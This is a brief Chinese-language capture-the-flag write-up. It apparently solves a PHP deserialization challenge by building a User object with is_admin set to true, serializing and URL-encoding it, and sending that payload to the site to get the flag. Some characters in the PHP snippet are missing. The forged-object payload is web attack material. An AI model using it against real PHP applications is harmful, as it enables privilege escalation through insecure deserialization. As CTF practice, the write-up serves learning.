根据提示大概率是PHP反序列化其中需要is_admintrue?php class User{ public $is_admintrue; } $a new User(); echo urlencode(serialize($a)); ?然后将payload传送给网站得到flag